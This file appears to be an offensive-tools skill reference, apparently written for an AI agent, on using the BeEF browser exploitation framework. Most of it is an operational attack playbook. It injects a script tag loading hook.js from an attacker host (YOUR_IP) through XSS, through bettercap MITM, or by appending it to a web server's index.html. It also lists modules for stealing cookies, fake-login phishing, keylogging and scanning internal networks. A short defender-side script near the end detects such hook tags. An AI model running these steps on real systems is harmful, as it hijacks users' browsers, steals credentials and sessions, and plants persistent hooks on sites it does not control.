offensive-tools/exploits/beef/SKILL.md
Auth/lab ref: Browser Exploitation Framework - hook browsers via XSS/injected JS and perform client-side testing.
Hook browsers via XSS and execute client-side attacks from a web console.

```bash
# Kali
beef-xss

# Or from source
git clone https://github.com/beefproject/beef
cd beef && ./install && ./beef

# Panel: http://127.0.0.1:3000/ui/panel
# Default creds: beef/beef
# Hook URL: http://YOUR_IP:3000/hook.js
```

```html
<!-- Inject in XSS payload or MITM response -->
<script src="http://YOUR_IP:3000/hook.js"></script>
```

| Category | Examples |
|----------|---------|
| Network | Port scanner, ping sweep, SSRF |
| Browser | Fingerprint, clipboard steal, camera access |
| Social Engineering | Fake login, fake update, clickjacking |
| Exploits | Browser CVEs, Java exploits |
| Persistence | Persistent hook via service worker |
| Misc | Keylogger, screenshot, geolocation |

Steal cookies via hooked browser:

```
Modules > Browser > Hooked Domain > Get Cookie
```

Phishing via fake login overlay:

```
Modules > Social Engineering > Pretty Theft
```

Port scan internal network from browser:

```
Modules > Network > Port Scanner
# Set targets: 192.168.1.1-254
```

```
// Service Worker persistence (browser-based)
// Modules > Persistence > Create Foreground iFrame
// Modules > Persistence > Man-In-The-Browser
```

```bash
# Embed in page permanently (if you have file write)
echo '<script src="http://YOUR_IP:3000/hook.js"></script>' >> /var/www/html/index.html
```

`config.yaml`:

```yaml
beef:
  credentials:
    user: "beef"
    passwd: "changeme"  # Change default
  http:
    host: "0.0.0.0"
    port: "3000"
    https:
      enable: true
      port: "3001"
```

```bash
# Inject via Responder + MITM (if on LAN)
# Inject via stored XSS
# Inject via MITM with bettercap
bettercap -eval "set http.proxy.injectjs http://YOUR_IP:3000/hook.js; http.proxy on"
```
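
Detecting the hook tag from the defender's side, as an added example that is not part of the original skill file: it parses a served page and flags external `<script>` sources that match the defaults shown above (`hook.js`, port 3000) or that come from an origin outside an allowlist. The allowlist hosts, the name `audit_scripts` and the sample page are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: the only origins this site is expected to load scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.example.test", "cdn.example.test"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def audit_scripts(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (src, reasons) for each external script that looks injected."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        url = urlsplit(src)
        if not url.hostname:  # relative path: same-origin script, skip
            continue
        reasons = []
        if url.hostname not in allowed_hosts:
            reasons.append("unapproved-origin")
        if url.path.rsplit("/", 1)[-1].lower() == "hook.js":
            reasons.append("hook.js-filename")
        if url.port == 3000:
            reasons.append("port-3000")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample: a page with one tag appended after </html>.
SAMPLE_PAGE = """<html><body><h1>Intranet</h1>
<script src="/static/app.js"></script>
<script src="https://cdn.example.test/lib.min.js"></script>
</body></html>
<script src="http://203.0.113.10:3000/hook.js"></script>
"""
```

The port is a setting in `config.yaml`, so the `unapproved-origin` reason is the signal to rely on; the other two only match an unmodified default install.
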
| File | When to load |
|------|--------------|
| references/modules.md | Full module list by category, hook persistence techniques |